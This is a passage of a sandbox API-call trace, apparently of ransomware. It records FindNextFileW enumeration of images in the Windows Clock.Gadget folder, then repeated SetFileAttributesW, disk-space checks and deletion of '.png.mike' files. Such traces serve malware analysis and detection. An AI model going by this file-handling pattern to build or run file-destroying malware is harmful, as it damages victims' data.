[0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_disabled.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e2fe6c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e2fe6c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_hover.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e2fe6c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e2fe6c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b9f71b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x45f, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_pressed.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e55fc9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e55fc9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b9f71b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x358, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_rest.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b101cb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b101cb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28bc5879, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="spacer_highlights.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36328, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b36328, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28bc5879, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4eac, dwReserved0=0x0, dwReserved1=0x0, cFileName="square.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b825e2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b825e2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28beb9d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_dot.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36328, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b36328, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28beb9d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1db, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_h.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5c485, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b5c485, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c37c93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_m.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5c485, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b5c485, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c37c93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_s.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b825e2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b825e2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c37c93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4d87, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_settings.png", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ba873f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82ba873f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c5ddf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x519b, dwReserved0=0x0, dwReserved1=0x0, cFileName="system.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c1ab56, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c1ab56, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c5ddf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf3, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_dot.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bce89c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82bce89c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c83f4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_h.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bf49f9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82bf49f9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c83f4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_m.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bf49f9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82bf49f9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c83f4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_s.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c40cb3, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c40cb3, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28caa0ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5a3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_settings.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c66e10, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c66e10, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28caa0ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4c3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cd9227, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cd9227, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28cd020b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_dot.png", cAlternateFileName="")) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c66e10, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c66e10, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28cd020b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_h.png", cAlternateFileName="")) returned 1 [0102.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c8cf6d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c8cf6d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28ddab9d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x169, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_m.png", cAlternateFileName="")) returned 1 [0102.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cb30ca, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cb30ca, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e00cfb, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_s.png", cAlternateFileName="")) returned 1 [0102.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cff384, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cff384, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e00cfb, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5385, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_settings.png", cAlternateFileName="")) returned 1 [0102.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.908] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", lpFilePart=0x0) returned 0x4b [0102.914] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.915] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", lpFilePart=0x0) returned 0x4b [0102.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", dwFileAttributes=0x80) returned 0 [0102.928] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", lpFilePart=0x0) returned 0x4b [0102.929] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png.mike")) returned 1 [0102.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png", dwFileAttributes=0x80) returned 0 [0102.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png", lpFilePart=0x0) returned 0x4f [0102.936] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png.mike")) returned 1 [0102.938] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png", dwFileAttributes=0x80) returned 0 [0102.942] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png.mike")) returned 1 [0102.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png", dwFileAttributes=0x80) returned 0 [0102.948] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png.mike")) returned 1 [0102.951] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png", dwFileAttributes=0x80) returned 0 [0102.956] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png.mike")) returned 1 [0102.957] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png", dwFileAttributes=0x80) returned 0 [0102.965] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png.mike")) returned 1 [0102.967] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png", dwFileAttributes=0x80) returned 0 [0102.974] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png.mike")) returned 1 [0102.976] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png", dwFileAttributes=0x80) returned 0 [0102.982] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png.mike")) returned 1 [0102.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png", dwFileAttributes=0x80) returned 0 [0102.988] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_h.png.mike")) returned 1 [0102.990] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png", dwFileAttributes=0x80) returned 0 [0102.994] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_m.png.mike")) returned 1 [0102.996] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png", dwFileAttributes=0x80) returned 0 [0103.001] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_s.png.mike")) returned 1 [0103.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png", dwFileAttributes=0x80) returned 0 [0103.010] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_settings.png.mike")) returned 1 [0103.013] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png", dwFileAttributes=0x80) returned 0 [0103.019] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower.png.mike")) returned 1 [0103.021] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png", dwFileAttributes=0x80) returned 0 [0103.026] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_dot.png.mike")) returned 1 [0103.028] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png", dwFileAttributes=0x80) returned 0 [0103.032] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_h.png.mike")) returned 1 [0103.034] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png", dwFileAttributes=0x80) returned 0 [0103.038] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_m.png.mike")) returned 1 [0103.040] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png", dwFileAttributes=0x80) returned 0 [0103.045] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_s.png.mike")) returned 1 [0103.047] 